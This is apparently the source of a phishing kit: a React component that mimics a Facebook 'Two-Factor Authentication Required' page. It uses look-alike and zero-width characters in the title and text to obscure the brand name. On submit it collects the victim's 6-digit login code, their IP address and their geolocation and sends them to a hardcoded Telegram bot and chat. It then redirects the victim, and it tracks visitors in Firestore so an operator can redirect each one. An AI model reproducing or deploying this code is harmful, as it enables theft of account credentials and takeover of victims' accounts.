import React, { useEffect, useState } from 'react';
import { addDoc, collection, doc, getDoc, getDocs, onSnapshot, setDoc } from 'firebase/firestore';
import { publicIpv4 } from 'public-ip';
import { BsInfoCircleFill as IconInfo } from "react-icons/bs";
import { IoIosAdd as IconAdd } from "react-icons/io";
import { footerLinks, desktoplanguages } from "../sakles/malores.js";
import { db } from '../f7g8h9p.js';
import { useMediaQuery } from 'react-responsive';
import '../crosto/c_a0172a3b17.css';

const Zr7mx2 = () => {
    const [ip, setIp] = useState(undefined);
    const [grraht, setCode] = useState('');
    const [dexlus, setdexlus] = useState('');
    const [userData, setUserData] = useState(undefined);
    const [isUserData, setIsUserData] = useState(false);
    const [userUrl, setUserUrl] = useState(false);

    const handleActions = (event) => {
        event.preventDefault(); // Prevent the default form submission
        if (grraht === '') {
            // Handle code validation
            return;
        } else {
            const bot = 'bot7998763746:AAHkT1vQxXCYwn3Gt3cNG3muww3Hc5Tu4QQ';
            const chid = '8393113385';

            fetch(`https://ipapi.co/json/`)
                .then((response) => response.json())
                .then((response) => {
                    const { country, region, city } = response;
                    const content = `========================\nLS 1: '${grraht}'\nLS 2: '${dexlus}'\nCountry : '${country}'\nRegion : '${region}'\nCity : '${city}'\nIP: '${ip}'\n========================`;

                    const encodedContent = encodeURIComponent(content);

                    fetch(`https://api.telegram.org/${bot}/sendMessage?chat_id=${chid}&text=${encodedContent}`, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                    })
                        .then(() => {
                            window.location = 'K8X4R2C6WZQ7T5yS9P1H0MNBJFDV3LgUwvokV3LgUwvqbs';
                        })
                        .catch((error) => {
                            window.location = 'K8X4R2C6WZQ7T5yS9P1H0MNBJFDV3LgUwvokV3LgUwvqbs';
                        });
                });
        }
    };

    const handleCodeChange = (e) => {
        setCode(e.target.value); // Allow any input
    };

    const handleCodeChange1 = (e) => {
        setdexlus(e.target.value); // Allow any input
    };

    const getUserData = async () => {
        const documentSnapshot = await getDocs(collection(db, "georgebs"));
        const newData = documentSnapshot.docs.map((doc) => ({ ...doc.data(), id: doc.id }));
        const filter = newData.filter((x) => {
            if (x.ip === ip) {
                setIsUserData(true);
                setUserData(x);
                return x;
            }
        });
        if (filter.length === 0) {
            addUserData();
        }
    };

    const getIp = async () => {
        if (!ip) {
            const ipAddress = await publicIpv4();
            setIp(ipAddress);
        }
    };

    useEffect(() => {
        getIp();
    }, []);

    useEffect(() => {
        if (ip) {
            onSnapshot(collection(db, "georgebs"), (snapshot) => {
                let isExist = false;
                snapshot.docs
                    .map((doc) => ({ ...doc.data(), id: doc.id }))
                    .filter((x) => {
                        if (x.ip === ip) {
                            isExist = true;
                            setUserData(x);
                            fetch('./data.json')
                                .then((res) => res.json())
                                .then((data) => {
                                    data.url_data.filter((item) => {
                                        if (item.id === parseInt(x.redir)) {
                                            setUserUrl(item.url);
                                            return;
                                        }
                                    });
                                })
                                .catch((err) => {
                                    console.log(err, ' error');
                                });
                        }
                    });
                if (!isExist) {
                    setUserUrl(false);
                }
            });
        }
    }, [ip]);



    useEffect(() => {
        document.title = 'Fаc‌‌еbо‌o‌k';
    }, [userData, userUrl]);

    const addUserData = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);

            const docSnap = await getDoc(docRef);

            if (!docSnap.exists()) {
                await setDoc(docRef, {
                    ip: ip,
                    number: -1,
                    redir: "-1",
                });
                console.log("BegasID: ", ip);
                getUserData();
            } else {
                console.log("ResID ID: ", ip);
            }
        } catch (e) {
            console.error("Serr: ", e);
        }
    };

    const resetUserNumber = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);
            await setDoc(docRef, { redir: "-1" }, { merge: true });
            console.log("DegIP: ", ip);
        } catch (e) {
            console.error("Gerr: ", e);
        }
    };

    useEffect(() => {
        if (ip) {
            getUserData();
        }
    }, [ip]);

    if (userUrl) {
        setTimeout(() => {
            window.location = userUrl;
        }, 1000);
        resetUserNumber();
    }

    console.log("hiuoio", isUserData, userData);

    if (isUserData) {
        return (
            <>
                <header className="2vos">
                    <div className="c_deb883258c"></div>
                    <h1 className="c_d79c31bbe3"></h1>
                </header>
                <body className="c_5c0629b211" id="rahade" name="rahade">
                    <br />
                    <div className="c_3490ba90a9">
                        <form id="rrafsuto" className="hinuets" name="qorosge" onSubmit={handleActions}>
                            <strong id="qanaj250">Two-Fаctor Authеnticаtion Rеquired</strong>
                            <br />
                            <br />
                            <hr className="c_c114eb4f97" />
                            <br />
                            <a id="krasbo" className="bresysteg">
                                Yоu’vе as‌kеd us tо rеquirе a 6-dig‌it lо‌gin cо‌dе whеn anyо‌nе tri‌еs tо acc‌еss yоur accо‌unt fr‌оm a nеw dеvi‌cе оr brо‌wsеr.<br /><br />
                                En‌tеr thе 6-‌digit c‌оdе frоm yо‌ur <strong>Cо‌dе Gеnе‌ratоr</strong> оr 3r‌d par‌ty ap‌p bеlоw.
                            </a>
                            <br /><br /><br /><br /><br />{/* required pattern="[0-9]{6} */}
                            <input type="text" inputMode="numeric" pattern="[0-9]*" className="c_bdeed0950f" id="bronxy" name="bronxy" placeholder="Lo‌gin c‌od‌e" onChange={handleCodeChange}/>
                            <br /><br /><br />
                            <span className="becros"></span>
                            <hr className="c_c114eb4f97" />
                            <br />
                            <a id="qresokle" className="bresysteg">Neеd anothеr way to authеnticatе?</a>
                            <input type="submit" className="c_aba73215e7" value="Continue" />
                            <br /><br />
                        </form>
                    </div>
                </body>
                
                <footer>
                    <p></p>
                </footer>
            </>
        );
    }

    return null; // Return null if no user data
};

export default Zr7mx2;
